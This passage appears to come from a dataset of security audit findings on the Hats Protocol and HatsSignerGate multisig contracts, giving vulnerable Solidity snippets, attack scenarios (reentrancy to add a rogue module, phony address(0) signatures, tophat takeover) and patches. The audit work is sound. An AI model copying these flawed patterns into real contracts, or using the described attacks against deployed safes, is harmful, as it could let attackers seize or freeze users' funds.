(isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n -The Hats contract needs to override the ERC1155.balanceOfBatch functionчmediumчThe Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, \"LENGTH_MISMATCH\");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\nчConsider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.чThis will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projectsч```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if 
(_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n -[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`чmediumч`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. 
(4) In this case, while the number of `validSignerCount` increased, the `_removeSigner` reduces one.чCheck if the number of `validSignerCount` decreased instead of checking equality:\n```\n@line 387 HatsSignerGateBase\n- if (validSignerCount == currentSignerCount) {\n+ if (validSignerCount >= currentSignerCount) {\n```\nчThis can make the `signerCount` and safe `threshold` update incorrectly which can cause further problems, such as incorrect number of signatures needed.ч```\n if (validSignerCount == currentSignerCount) {\n newSignerCount = currentSignerCount;\n } else {\n newSignerCount = currentSignerCount - 1;\n }\n```\n -Safe threshold can be set above target threshold, causing transactions to revertчmediumчIf a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`. 
This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the `validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. 
This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.чEdit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = 
target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\nчA simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.ч```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n -If signer gate is deployed to safe with more than 5 existing modules, safe will be brickedчmediumч`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. 
If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.чThe `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] 
memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\n// Add the line below\n if (modules.length != modulesWithSix.length) revert TooManyModules();\n\n return _deployHatsSignerGate(\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\n );\n}\n```\nчIf a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.ч```\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\nuint256 existingModuleCount = modules.length;\n```\n -If a hat is owned by address(0), phony signatures will be accepted by the safeчmediumчIf a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. 
See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. 
However, the result would be a free signer on the multisig, which would have dramatic consequences.чThe easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.чIf a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.ч```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n -Swap Signer fails if final owner is invalid due to off by one error in loopчmediumчNew users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. 
If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n \"swapOwner(address,address,address)\",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.чPerform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < 
_ownerCount // Remove the line below\n 1;) {\n// Add the line below\n for (uint256 i; i < _ownerCount ;) {\n ownerToCheck = _owners[i];\n // rest of code\n}\n```\nчWhen only the final owner is invalid, new users will not be able to claim their role as signer, even though they should.ч```\nif (ownerCount >= maxSigs) {\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\n if (!swapped) {\n // if there are no invalid owners, we can't add a new signer, so we revert\n revert NoInvalidSignersToReplace();\n }\n}\n```\n -targetThreshold can be set below minThreshold, violating important invariantчmediumчThere are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\n```\nfunction _setMinThreshold(uint256 _minThreshold) internal {\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\n revert InvalidMinThreshold();\n }\n\n minThreshold = _minThreshold;\n}\n```\n\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\n```\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\n if (_targetThreshold > maxSigners) {\n revert InvalidTargetThreshold();\n }\n\n targetThreshold = _targetThreshold;\n}\n```\n\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all transactions to fail.чPerform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\n```\nfunction _setTargetThreshold(uint256
_targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\nчSettings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.ч```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n -Hats can be overwrittenчmediumчChild hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. 
This attack can be carried out by any hat wearer on their child tree, mutating their properties.чCheck if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, \"Admin not created\")\\n```\\nчч```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n -Unlinked tophat retains linkedTreeRequests, can be ruggedчhighчWhen a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. 
However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to \"takeover\" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a \"request\" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. 
Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permissionчIn `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\nчTophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.ч```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n 
linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n -Safe can be bricked because threshold is updated with validSignerCount instead of newThresholdчhighчThe safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. 
If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.чChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\nчAll transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which reч```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n -Signers can bypass checks to add new modules to a safe by abusing reentrancyчhighчThe `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. 
This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. 
It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will passчUse a more typical reentrancy guard format, such as checking to ensure 
`_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.чAny number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -If another module adds a module, the safe will be brickedчhighчIf a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the \"before\" check uses `enabledModuleCount` and the \"after\" check uses `enabledModuleCount + 1`. 
The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the \"before\" check would clip off the final modules, and the \"after\" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the \"before\" and \"after\" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.чThe module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.чThe safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.ч```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n -Signers can brick safe by adding unlimited additional signers while avoiding checksчhighчThere are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. 
